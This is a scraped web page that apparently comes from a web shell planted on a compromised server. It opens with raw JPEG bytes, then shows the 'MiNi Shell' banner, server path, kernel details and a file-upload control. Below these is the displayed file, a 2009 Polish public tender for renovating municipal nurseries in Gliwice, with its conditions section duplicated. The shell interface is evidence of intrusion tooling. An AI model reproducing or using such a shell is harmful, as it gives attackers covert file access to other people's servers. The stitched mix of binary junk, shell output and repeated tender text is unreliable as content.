JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/44930-N-2009.html

<p class="kh_header"><b>Gliwice: Zad.nr 1:Roboty remont.-bud. budynku O/I:Remont częściowy dachu, renowacja elewacji budynku.
Zad.nr 2:Roboty remont.-bud. budynku O/II:1)Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem.2)Remont pomieszczeń żłobka.
Zad.nr 3:Roboty remont.-bud. budynku O/III:Remont tarasu grupy IV łącznie z robotami towarzyszącymi.
Zad.nr 4:Roboty remont.-bud. budynku O/IV:1)Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu.2)Remont tarasu do werandowania.3)Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu</b><br>
<b>Numer ogłoszenia: 44930 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Żłobki Miejskie , ul. Kozielska 71, 44-121 Gliwice, woj. śląskie, tel. 032 2383292.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład opieki zdrowotnej - żłobek.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zad.nr 1:Roboty remont.-bud. budynku O/I:Remont częściowy dachu, renowacja elewacji budynku.
Zad.nr 2:Roboty remont.-bud. budynku O/II:1)Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem.2)Remont pomieszczeń żłobka.
Zad.nr 3:Roboty remont.-bud. budynku O/III:Remont tarasu grupy IV łącznie z robotami towarzyszącymi.
Zad.nr 4:Roboty remont.-bud. budynku O/IV:1)Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu.2)Remont tarasu do werandowania.3)Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1: 
Roboty remontowo-budowlane budynku Oddziału I Żłobków Miejskich  w Gliwicach ul.  Berbeckiego 10: Remont częściowy dachu, renowacja elewacji budynku

Przedmiot robót remontowo-budowlanych: Remont częściowy dachu, renowacja elewacji budynku
Zakres prac:
 - wyregulowanie rynien i rur spustowych 
 - wymiana obróbek blacharskich
 - montaż płotków śniegowych w kolorze dachówki
 - renowacja elewacji - prace malarskie - powierzchnia 517,788 m2

Zadanie nr 2: 
Roboty remontowo-budowlane budynku Oddziału II Żłobków Miejskich  w Gliwicach ul.  Mewy 34: 1) Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem.                 2) Remont pomieszczeń żłobka
Przedmiot robót remontowo-budowlanych: 1) Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem
Zakres prac:
 - kompleksowy remont pokrycia papowego: rozebranie istniejącego pokrycia,  ułożenie dwóch warstw papy termozgrzewalnej, obróbki z papy termozgrzewalnej  - powierzchnia  dachu 351,563  m2
 - wymiana obróbek blacharskich - powierzchnia  23,438 m2
 -wymiana instalacji odgromowej 
- przemurowanie kominów ponad dachem


Przedmiot robót remontowo-budowlanych:  2) Remont pomieszczeń żłobka
Zakres prac:
 - roboty malarskie, posadzkowe, okładzinowe, wymiana drzwi  w 2 pomieszczeniach żłobka

Zadanie nr 3: 
Roboty remontowo-budowlane budynku Oddziału III Żłobków Miejskich  w Gliwicach ul.  Żeromskiego 26a: Remont tarasu grupy IV łącznie z robotami towarzyszącymi

Przedmiot robót remontowo-budowlanych: Remont tarasu grupy IV łącznie z robotami towarzyszącymi
Zakres prac:
 - wymiana balustrady tarasowej - balustrada wysokości 1,15 m i długości 20,86 m
 - wymiana posadzki tarasu wraz z warstwami podkładowymi i izolacją, wymiana: rynien, rur spustowych, obróbek blacharskich - powierzchnia  tarasu 40,306 m2
 - wykonanie robót towarzyszących - ujednolicenie elewacji, roboty malarskie

Zadanie nr 4: 
Roboty remontowo-budowlane budynku Oddziału IV Żłobków Miejskich  w Gliwicach ul.  Kozielska 71: 1) Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu. 2) Remont tarasu do werandowania.   3) Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu

Przedmiot robót remontowo-budowlanych: 1) Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu
Zakres prac:
 - wymiana desek balustrad balkonu i schodów,  malowanie balustrad - balustrada wysokości 1,1 m i długości 37,35 m
 - wymiana posadzki balkonu - powierzchnia  16,52 m2
 - wymiana okładzin stopni i podestu schodów, malowanie konstrukcji schodów - powierzchnia   31,96 m2

Przedmiot robót remontowo-budowlanych: 2) Remont tarasu do werandowania
Zakres prac:
 - wymiana posadzki tarasu - powierzchnia  231,381 m2
 - wymiana okładzin murków tarasu - powierzchnia  67,124 m2
 - wymiana opaski wzdłuż murków tarasu - powierzchnia   17,42 m2

Przedmiot robót remontowo-budowlanych: 3) Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu
Zakres prac:
 - renowacja pokrycia papowego ułożenie jednej warstwy papy termozgrzewalnej, obróbki z papy termozgrzewalnej  - powierzchnia  dachu 353,44  m2
 - wymiana obróbek blacharskich - powierzchnia  30,08 m2
 - roboty malarskie i posadzkowe w 6 pomieszczeniach żłobka.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.08-8, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki przystąpienia do postępowania:
1.1.	 Warunki przystąpienia do postępowania i wymagane dokumenty 
1.1.1. 	Posiadanie uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podleganie wykluczeniu z postępowania o udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określają: art. 24 ust. 1 i 2 ustawy pzp). 
w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu, zgodnie z art. 24 ust. 1 i 2, o którym mowa powyżej muszą spełniać wszystkie podmioty działające wspólnie, warunek posiadania uprawnień musi spełniać co najmniej jeden z podmiotów występujących wspólnie, 
1.1.1.1. W celu potwierdzenia, warunku(ów) określonego(ych) w pkt 1.1.1. - należy złożyć: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników; 
b)	aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.1.2. Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel:
- kierownika robót posiadającego uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego(dotyczy zadania: nr 1, nr 2, nr 3, nr 4) 
b)	Doświadczenie zawodowe: 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością realizację co najmniej 3 robót odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot niniejszego zamówienia (zgodnie z opisem robót dla danego zadania zamieszczonym w punkcie (Przedmiot zamówienia oraz wielkość lub zakres zamówienia) o wartości nie mniejszej niż: 50.000,00 zł (brutto) każda robota (dotyczy zadania: nr 1, nr 2, nr 3, nr 4)
W przypadku podmiotów działających wspólnie potencjał techniczny i osoby zdolne do  wykonania zamówienia podlegają sumowaniu, tak aby łącznie podmioty spełniały powyższe warunki.
1.1.2.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.2 należy złożyć: 
a)	dokumenty stwierdzające, że kierownik robót, który będzie wykonywać przedmiot zamówienia posiada wymagane uprawnienia budowlane oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego z uwzględnieniem wymogów wg pkt 1.1.2.a.. 
b)	wykaz na zał. nr 3 do Specyfikacji Istotnych Warunków Zmówienia (SIWZ) lub dokumencie zgodnym z treścią załącznika osób które będą uczestniczyć w wykonywaniu zamówienia. 
c)	wykaz (na zał. nr 4 do SIWZ lub dokumencie zgodnym z treścią załącznika) wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów (np. referencji) potwierdzających, że roboty te zostały wykonane należycie z uwzględnieniem wymogów wg pkt 1.1.2.b. 
1.1.3.  Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
Wykonawca winien mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji zamówienia.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu 
1.1.3.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.3 należy złożyć: 
oświadczenie na załączniku nr 2 do SIWZ
1.1.4. W celu potwierdzenia warunków określonych w pkt 1.1.1, 1.1.2, 1.1.3 należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) o treści ZAŁĄCZNIKA NR 2, załączonego do SIWZ; 
1.2. 	Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Polski 
1.2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Polski, zamiast: 
-	aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, 
-	aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie zalega z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 1.2.1., składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
1.3. Opis sposobu dokonywania oceny spełnienia warunków przystąpienia do postępowania 
1.3.1. Ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w  pkt 1.  na zasadzie spełniania/nie spełnia. 
1.3.2. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił warunki wymienione w pkt 1.  
UWAGA! Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez Zamawiającego, spowoduje wykluczenie Wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty nie spełniające wymogów, traktuje się jako nie złożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3 ustawy pzp. 



2.	Pozostałe dokumenty i oświadczenia, jakie musi zawierać oferta
2.1. 	Wykonawcy mogą wspólnie ubiegać się  udzielenie zamówienia z następującym zastrzeżeniem: 
2.1.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu (lub reprezentowania w postępowaniu i zawarcia umowy). Stosowne pełnomocnictwo należy załączyć do oferty w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza.
2.1.2. Pełnomocnictwo, o którym mowa w pkt 9.1.1. musi precyzować zakres umocowania i wskazywać pełnomocnika. Musi też wyliczać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie i każdy z nich musi podpisać się pod tym dokumentem.  
2.2. Wypełniony i podpisany druk oferty - ZAŁĄCZNIK NR 1 do SIWZ. 
2.3. Wykaz podwykonawców którzy będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat zakresu wykonywanych przez nich czynności na załączniku Nr 6 do SIWZ. (jeśli dotyczy)
2.4. Podpisany kosztorys ofertowy szczegółowy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Warunki przystąpienia do postępowania:
1.1.	 Warunki przystąpienia do postępowania i wymagane dokumenty 
1.1.1. 	Posiadanie uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podleganie wykluczeniu z postępowania o udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określają: art. 24 ust. 1 i 2 ustawy pzp). 
w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu, zgodnie z art. 24 ust. 1 i 2, o którym mowa powyżej muszą spełniać wszystkie podmioty działające wspólnie, warunek posiadania uprawnień musi spełniać co najmniej jeden z podmiotów występujących wspólnie, 
1.1.1.1. W celu potwierdzenia, warunku(ów) określonego(ych) w pkt 1.1.1. - należy złożyć: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników; 
b)	aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.1.2. Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel:
- kierownika robót posiadającego uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego(dotyczy zadania: nr 1, nr 2, nr 3, nr 4) 
b)	Doświadczenie zawodowe: 
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością realizację co najmniej 3 robót odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot niniejszego zamówienia (zgodnie z opisem robót dla danego zadania zamieszczonym w punkcie (Przedmiot zamówienia oraz wielkość lub zakres zamówienia) o wartości nie mniejszej niż: 50.000,00 zł (brutto) każda robota (dotyczy zadania: nr 1, nr 2, nr 3, nr 4)
W przypadku podmiotów działających wspólnie potencjał techniczny i osoby zdolne do  wykonania zamówienia podlegają sumowaniu, tak aby łącznie podmioty spełniały powyższe warunki.
1.1.2.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.2 należy złożyć: 
a)	dokumenty stwierdzające, że kierownik robót, który będzie wykonywać przedmiot zamówienia posiada wymagane uprawnienia budowlane oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego z uwzględnieniem wymogów wg pkt 1.1.2.a.. 
b)	wykaz na zał. nr 3 do Specyfikacji Istotnych Warunków Zmówienia (SIWZ) lub dokumencie zgodnym z treścią załącznika osób które będą uczestniczyć w wykonywaniu zamówienia. 
c)	wykaz (na zał. nr 4 do SIWZ lub dokumencie zgodnym z treścią załącznika) wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów (np. referencji) potwierdzających, że roboty te zostały wykonane należycie z uwzględnieniem wymogów wg pkt 1.1.2.b. 
1.1.3.  Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
Wykonawca winien mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji zamówienia.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu 
1.1.3.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 1.1.3 należy złożyć: 
oświadczenie na załączniku nr 2 do SIWZ
1.1.4. W celu potwierdzenia warunków określonych w pkt 1.1.1, 1.1.2, 1.1.3 należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) o treści ZAŁĄCZNIKA NR 2, załączonego do SIWZ; 
1.2. 	Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Polski 
1.2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Polski, zamiast: 
-	aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, 
-	aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-	nie zalega z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 1.2.1., składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
1.3. Opis sposobu dokonywania oceny spełnienia warunków przystąpienia do postępowania 
1.3.1. Ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w  pkt 1.  na zasadzie spełniania/nie spełnia. 
1.3.2. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił warunki wymienione w pkt 1.  
UWAGA! Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez Zamawiającego, spowoduje wykluczenie Wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty nie spełniające wymogów, traktuje się jako nie złożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3 ustawy pzp. 



2.	Pozostałe dokumenty i oświadczenia, jakie musi zawierać oferta
2.1. 	Wykonawcy mogą wspólnie ubiegać się  udzielenie zamówienia z następującym zastrzeżeniem: 
2.1.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu (lub reprezentowania w postępowaniu i zawarcia umowy). Stosowne pełnomocnictwo należy załączyć do oferty w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza.
2.1.2. Pełnomocnictwo, o którym mowa w pkt 9.1.1. musi precyzować zakres umocowania i wskazywać pełnomocnika. Musi też wyliczać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie i każdy z nich musi podpisać się pod tym dokumentem.  
2.2. Wypełniony i podpisany druk oferty - ZAŁĄCZNIK NR 1 do SIWZ. 
